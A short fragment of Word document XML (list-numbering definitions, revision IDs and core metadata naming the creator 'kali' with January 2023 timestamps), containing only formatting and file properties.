    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFDE5C6F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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D39DA"/>
    <w:rsid w:val="11BD39DA"/>
    <w:rsid w:val="7BFD8319"/>
    <w:rsid w:val="F547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2023-01-18T22:49:00Z</dcterms:created>
  <dc:creator>kali</dc:creator>
  <cp:lastModifiedBy>kali</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-19T00:17:26Z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